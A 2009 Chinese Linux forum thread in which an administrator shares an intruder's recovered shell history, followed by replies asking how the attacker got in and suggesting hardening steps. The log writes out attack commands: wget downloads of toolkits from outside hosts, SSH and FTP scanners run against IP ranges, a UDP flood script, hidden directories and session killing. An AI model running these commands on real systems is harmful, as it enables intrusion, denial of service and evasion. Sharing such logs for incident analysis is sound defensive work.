免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 3222 | 回复: 8

服务器被人黑了,大家来评论看 [复制链接]

论坛徽章:
0
发表于 2009-04-08 10:06 |显示全部楼层
web:/home/userbak# vim .bash_history

perl 84.122.186.0 0 0
cd
perl 84.122.186.0 0 0
cd
ls
cd ..
ls
cd user
perl.exe 84.122.186.0 0 0
perl 84.122.186.0 0 0
perl udp.pl 84.122.186.0 0 0
df -h
ls
ls  ..
cd /tmp/
mkdir .ssh
cd .ssh
mkdir " "
cd " "
wget igotsluts.com/test/s.tgz
tar zxfv s.tgz
cd salma
./x 212.224 22
ps aux
cd /tmp/
mkdir .ssh
cd .ssh
ls
ls ?
cd salma
cd " "
mkdir " "
cd " "
cd salma
cd
ls
ls ?
cd
ls ?
ls
cd
mkdir /tmp
rm -rf /tmp/
ps aux
rm -rf /tmp/
mkdir /tmp
cd .ssh
rm -rf tmp
ls
ls ?
ls ..
cd ..
?
ls
cd user
ls
ls ?
cd /tmp/
mkdir /tmp/
mkdir " "
cd " "
wget igotsluts.com/test/s.tgz
tar zxfv s.tgz
cd salma
./x 94.75 22
ls
uname -a
ps -a
ps a
ps aux
ls
cd /tmp/
ls
cd .X11-unix/
ls
mkdir " "
cd " "
wget igotsluts.com/test/s.tgz
tar zxf s.tgz
ls
cd salma/
ls
./x
screen
./x 87.106 22
./x 83.221 22
w
passwd
ls
w
skill -KILL pts/2
w
skill -KILL pts/0
ls
ls -la
cat .bash_history
ls
ls
ls -la
cd " "
ls -la
cd salma/
ls
cat vuln.txt
w
ls
./x 210.3 22
ls
w
screen -r
cd ..
ls
rm -rf s.tgz
ls
cd ..
ls
/var/tmp
ls
cd /tmp
ls
cd /var/tmp
ls
ls -la
mkdir .oracle
wget igotsluts.com/test/s.tgz
tar zxvf s.tgz
ls
cd salma/
ls
wget www.bye.ro/screen
chmod +x *
ls
./screen -r
w
cd /var/tmp
ls
cd salma/
ls
nano x
vi xxl
chmod +x *
./x 210.3
./x 210.3 22
ls
rm -rf 210.3.ps.22 mfu.txt
./xxl
w
ls
cd /tmp
ls
ls -la
cd "
ls
cd " "
ls
ls -la
ls
cat vuln.txt
cd ..
ls
cd /home
ls
cd user/
ls
ls -la
cd /tmp ls -la
ls -la
cd /var/tmp
ls -la
cd .oracle/
ls
ls -la
cd ..
ls
w
rm -rf *
ls
cd ..
ls
rm -rf *
ls
wget www.bye.ro/fb.tar
tar xvf fb.tar
ls
rm -rf fb.tar
ls
rm -rf log
nano users
ls
./0-100 216
./200-255 216
cat log
ps ax
ls
./100-200 216
cat log
nano pass
cat log
cat log
nano users
cat log
cat log
ls
killal -9 ftp_scanner
killall -9 f
ls
killall -9 ftp_scanner
ps ax
ls
rm -rf log
./0-100 64
cat log

[ 本帖最后由 theanswer 于 2009-4-8 10:09 编辑 ]

论坛徽章:
0
发表于 2009-04-08 16:54 |显示全部楼层
从哪进去的?

论坛徽章:
0
发表于 2009-04-09 09:40 |显示全部楼层
囧的是也没找到从哪里进来的,没有得到root权限,

论坛徽章:
0
发表于 2009-04-13 13:55 |显示全部楼层
php.ini
disable_functions
safe_mode
sshd_config端口与IP限制
网站后台及重要目录IP限制

论坛徽章:
0
发表于 2009-04-15 07:21 |显示全部楼层
看不懂 我的WIN2003经常被黑。。 (

论坛徽章:
0
发表于 2009-06-13 11:57 |显示全部楼层
我可以帮你们解决服务器经常被黑的安全问题

论坛徽章:
0
发表于 2009-06-18 11:53 |显示全部楼层

回复 #6 myfreeke 的帖子

把你的经验共享一下咯

论坛徽章:
5
技术图书徽章
日期:2014-02-10 10:55:18技术图书徽章
日期:2014-03-17 16:37:45狮子座
日期:2014-04-25 11:17:42未羊
日期:2014-08-13 11:45:23天蝎座
日期:2015-12-16 10:30:37
发表于 2009-06-18 12:54 |显示全部楼层
看看chroot和selinux吧,web上的漏洞是防不住的

论坛徽章:
0
发表于 2009-06-18 23:37 |显示全部楼层
还是可以防的啦!
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

SACC2019中国系统架构师大会

【数字转型 架构演进】SACC2019中国系统架构师大会,8.5折限时优惠重磅来袭!
2019年10月31日~11月2日第11届中国系统架构师大会(SACC2019)将在北京隆重召开。四大主线并行的演讲模式,1个主会场、20个技术专场、超千人参与的会议规模,100+来自互联网、金融、制造业、电商等领域的嘉宾阵容,将为广大参会者提供一场最具价值的技术交流盛会。

限时8.5折扣期:2019年9月30日前


----------------------------------------

大会官网>>
  

北京盛拓优讯信息技术有限公司. 版权所有 16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122
中国互联网协会会员  联系我们:huangweiwei@it168.com
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP